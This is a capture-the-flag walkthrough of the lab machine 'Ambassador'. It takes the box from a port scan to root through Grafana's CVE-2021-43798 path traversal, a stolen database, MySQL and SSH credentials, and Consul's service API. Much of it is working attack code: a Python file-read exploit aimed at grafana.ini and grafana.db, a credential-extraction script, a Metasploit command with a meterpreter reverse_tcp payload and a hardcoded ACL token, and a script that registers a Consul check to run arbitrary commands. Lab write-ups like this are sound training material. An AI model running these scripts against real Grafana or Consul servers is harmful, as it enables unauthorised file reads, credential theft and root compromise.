Ambassador

Some nice Writeup

Scan Details

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
3000/tcp open  ppp     syn-ack
3306/tcp open  mysql   syn-ack

Looking at port 3000 we are presented with a login page for Grafana v8.2.0, which is vulnerable to directory traversal and arbitrary file read of local files (CVE-2021-43798, the bug that exploit-db 50581 targets). The vulnerable path is grafana_url/public/plugins/<plugin-id>/../../../<file>, where <plugin-id> is the id of any installed plugin.

Every Grafana instance ships with core plugins such as the Prometheus and MySQL data sources, so on every instance there are several plugin ids that open this path.

Enumeration.

We can reach the login screen and read the Grafana version from it, in our case on port 3000: v8.2.0 (d7f71e9eae).

Using curl we can also fetch the /login page directly; the version and commit hash are embedded in the page source.

Exploitation (Script)

Having identified the version as 8.2.0, which lies in the affected range (8.0.0-beta1 through 8.3.0; fixed in 8.0.7, 8.1.8, 8.2.7 and 8.3.1), we can confirm the application is vulnerable and use the automated script from https://www.exploit-db.com/exploits/50581 to read files.

We can then try the known readable config files for interesting information. Going by the default configuration documented at https://github.com/grafana/grafana/blob/main/conf/defaults.ini, /etc/grafana/grafana.ini looks interesting, since it holds the admin user and password under the [security] section.
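As an added example (not the writeup's own commands, and not the exploit-db script), this is the enumeration and traversal logic from the two sections above in one place: read the version out of /login, check it against the fix versions for CVE-2021-43798, and build the /public/plugins/<plugin-id>/../ URLs for a list of core plugin ids. The target URL, the plugin list and the `get` callable are assumptions; the HTTP client is only wired in under `__main__` so the rest runs offline.

```python
"""Added example, not code from the writeup or from exploit-db 50581: fingerprint Grafana
from /login, check the version against the CVE-2021-43798 fix versions, and build the
/public/plugins/<plugin-id>/../ traversal URLs used to read local files."""
import re

# Core plugin ids that ship with Grafana 8 (any one of them opens the traversal path).
DEFAULT_PLUGINS = ["alertlist", "annolist", "mysql", "prometheus", "postgres", "loki",
                   "elasticsearch", "graphite", "influxdb", "cloudwatch"]

# First fixed release per 8.x minor line, from the Grafana advisory for CVE-2021-43798.
FIXED = {(8, 0): (8, 0, 7), (8, 1): (8, 1, 8), (8, 2): (8, 2, 7), (8, 3): (8, 3, 1)}


def parse_version(login_html: str):
    """Extract the version Grafana embeds in the /login page source
    ('"version":"8.2.0"' inside the grafanaBootData blob). Returns (major, minor, patch)."""
    m = re.search(r'"version"\s*:\s*"(\d+)\.(\d+)\.(\d+)', login_html)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(version) -> bool:
    """True for 8.0.0-beta1 .. 8.3.0 builds older than the fixed release of their minor line."""
    major, minor, _ = version
    if (major, minor) not in FIXED:
        return False
    return version < FIXED[(major, minor)]


def traversal_url(base: str, plugin: str, path: str, depth: int = 8) -> str:
    """Build <base>/public/plugins/<plugin>/../../.../<path>. The ../ segments only have to
    climb past the plugin directory to /, so depth is generous rather than exact.
    Send the URL as-is: the HTTP client must not normalise the dot segments away
    (requests passes them through; curl needs --path-as-is)."""
    return f"{base.rstrip('/')}/public/plugins/{plugin}/" + "../" * depth + path.lstrip("/")


def read_file(base: str, path: str, get, plugins=DEFAULT_PLUGINS):
    """Try each plugin id until one serves the file. `get` is a callable url -> (status, body)
    so the logic runs offline; wire it to an HTTP client for a real target."""
    for plugin in plugins:
        status, body = get(traversal_url(base, plugin, path))
        if status == 200:
            return plugin, body
    return None


if __name__ == "__main__":
    import requests

    base = "http://target:3000"  # assumed target URL; replace with the real Grafana address

    def http_get(url):
        r = requests.get(url, timeout=10)
        return r.status_code, r.content  # bytes, so grafana.db survives the download

    version = parse_version(requests.get(base + "/login", timeout=10).text)
    print("version:", version, "affected:", bool(version and is_affected(version)))
    for f in ("/etc/passwd", "/etc/grafana/grafana.ini", "/var/lib/grafana/grafana.db"):
        hit = read_file(base, f, http_get)
        print(f, "via", hit[0] if hit else "no plugin", len(hit[1]) if hit else 0, "bytes")
```

The version check is the part worth keeping: a 9.x or an 8.2.7 instance has the same login page and the same plugin ids, but the path is no longer served, so checking the version before firing traversal requests saves noise in the target's logs.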

Exploitation (Manual)

We can also use curl to read the database file (by default /var/lib/grafana/grafana.db) through the same path and store it locally. Note that curl collapses the ../ segments before sending the request, so pass --path-as-is to keep them in the URL.

Now we can open the database file with sqlite3; the data_source table holds the connection credentials (user and password) for each configured data source.
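As an added example (not the writeup's own sqlite3 session), the same hunt done from Python's sqlite3 module without knowing Grafana's schema up front: walk every table in the file and pull the columns whose names look like credentials, which surfaces data_source and the user table on its own. The database built here is constructed with a few of Grafana's real column names; the rows are made up.

```python
"""Added example, not the writeup's own commands: schema-agnostic credential hunting in a
Grafana sqlite database. The sample db is constructed here with a few of Grafana's real
column names (data_source, user); the values are made up."""
import re
import sqlite3

# Column names worth pulling out of any table.
CRED_COLUMNS = re.compile(r"user|login|pass|secret|secure|token|key", re.I)


def build_sample_db(path: str = ":memory:") -> sqlite3.Connection:
    """Stand-in for /var/lib/grafana/grafana.db (constructed data, Grafana column names)."""
    con = sqlite3.connect(path)
    con.executescript("""
        CREATE TABLE data_source (id INTEGER, org_id INTEGER, name TEXT, type TEXT,
                                  "user" TEXT, password TEXT, secure_json_data TEXT);
        CREATE TABLE "user" (id INTEGER, login TEXT, email TEXT, password TEXT, salt TEXT);
        CREATE TABLE dashboard (id INTEGER, title TEXT);
        INSERT INTO data_source VALUES (1, 1, 'mysql.yaml', 'mysql', 'grafana', 'S3cretDsPass', '{}');
        INSERT INTO "user" VALUES (1, 'admin', 'admin@localhost', 'deadbeef', '1234');
        INSERT INTO dashboard VALUES (1, 'Home');
    """)
    return con


def list_tables(con):
    return [r[0] for r in con.execute("SELECT name FROM sqlite_master WHERE type='table'")]


def find_credentials(con):
    """Return (table, {column: value}) for every row of every table that has a
    credential-looking column. Identifiers are double-quoted because Grafana has a
    table literally named user."""
    hits = []
    for table in list_tables(con):
        cols = [r[1] for r in con.execute(f'PRAGMA table_info("{table}")')]
        wanted = [c for c in cols if CRED_COLUMNS.search(c)]
        if not wanted:
            continue
        select = ", ".join(f'"{c}"' for c in wanted)
        for row in con.execute(f'SELECT {select} FROM "{table}"'):
            hits.append((table, dict(zip(wanted, row))))
    return hits


if __name__ == "__main__":
    import sys
    # Pass the downloaded grafana.db on the command line; with no argument use the sample.
    con = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db()
    for table, creds in find_credentials(con):
        print(table, creds)
```

Two things to keep in mind when reading the real file: the plain password column on data_source is the legacy storage, while secure_json_data is encrypted with the [security] secret_key from grafana.ini, which is one more reason the .ini file is worth grabbing first; and the user table holds Grafana's own salted password hashes rather than anything reusable as-is.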

With the Grafana admin password from the .ini file and the MySQL credentials from the data_source table, we can log in to the MySQL server, where the whackywidget database holds some interesting information.

Foothold.

Now, with the password found in the whackywidget database, we can SSH in as the user developer and get the user flag.

Root Privesc (metasploit version).

Logged in as the developer user, looking around /opt we find two folders, consul and my-app; my-app contains some interesting logs.

From the logs we learn the box is running HashiCorp Consul's services API, and researching online we find that Consul can be exploited to gain remote command execution on Consul nodes: a service can be registered with a script health check, and an agent that has script checks enabled runs that check command itself. The Metasploit module below needs the agent's ACL token to register the service.

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost Your_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"

Using the above Metasploit command we get a root shell, since the check script runs with the privileges of the Consul agent, which here is root.
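To show what the module is doing on the wire, here is the Consul agent API exchange as an added example (not the writeup's code and not the Metasploit module's): a PUT to /v1/agent/service/register with a script check, authenticated with the ACL token from the command above, followed by a deregister once the check has fired. The agent address on 127.0.0.1:8500, the proof-of-execution command and the `put` callable are assumptions; requests is only wired in under `__main__`.

```python
"""Added example, not code from the writeup or from the Metasploit module: the Consul agent
API request that multi/misc/consul_service_exec makes. It registers a service whose health
check is a script; an agent started with enable_script_checks (or
enable_local_script_checks) runs that script every interval, as the user Consul runs as.
The token is the one from the writeup; the agent address and command are assumed."""
import json
import uuid

CONSUL = "http://127.0.0.1:8500"  # assumed: default agent address on the box
TOKEN = "bb03b43b-1d81-d62b-24b5-39540ee469b5"


def build_register_payload(cmd: str, name: str = "svc-check", interval: str = "10s") -> dict:
    """Body for PUT /v1/agent/service/register. Check.Args is executed without a shell,
    so the command is wrapped in /bin/sh -c. The service id is random so the exact
    service can be deregistered afterwards."""
    return {
        "ID": f"{name}-{uuid.uuid4().hex[:8]}",
        "Name": name,
        "Address": "127.0.0.1",
        "Port": 80,
        "Check": {
            "Args": ["/bin/sh", "-c", cmd],
            "Interval": interval,
            "Timeout": "5s",
            "DeregisterCriticalServiceAfter": "1m",
        },
    }


def headers(token: str) -> dict:
    """Consul reads the ACL token from the X-Consul-Token header."""
    return {"X-Consul-Token": token, "Content-Type": "application/json"}


def register(put, base: str, token: str, cmd: str):
    """Register the service. `put` is a callable (url, headers, body) -> status code so
    the request construction can be exercised offline. Returns (service_id, status)."""
    payload = build_register_payload(cmd)
    status = put(f"{base}/v1/agent/service/register", headers(token), json.dumps(payload))
    return payload["ID"], status


def deregister(put, base: str, token: str, service_id: str):
    """Remove the service once the check has fired, so the command stops re-running."""
    return put(f"{base}/v1/agent/service/deregister/{service_id}", headers(token), "")


if __name__ == "__main__":
    import time
    import requests

    def http_put(url, hdrs, body):
        return requests.put(url, headers=hdrs, data=body, timeout=10).status_code

    # Assumed proof-of-execution command; the same slot takes a reverse shell one-liner.
    sid, status = register(http_put, CONSUL, TOKEN, "id > /tmp/consul_check_out")
    print("register:", status, sid)
    time.sleep(15)  # wait one interval so the agent runs the check at least once
    print("deregister:", deregister(http_put, CONSUL, TOKEN, sid))
```

Two checks worth doing before blaming the token: a 200 on register with no file appearing usually means the agent was started without enable_script_checks, in which case the check is simply refused, and a 403 means the token lacks service:write for that service name. Deregistering afterwards matters because the check keeps re-running every interval until the service is gone or the agent restarts.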

Root Privesc (Manual).

I will later add the manual method of exploiting Consul using the API.
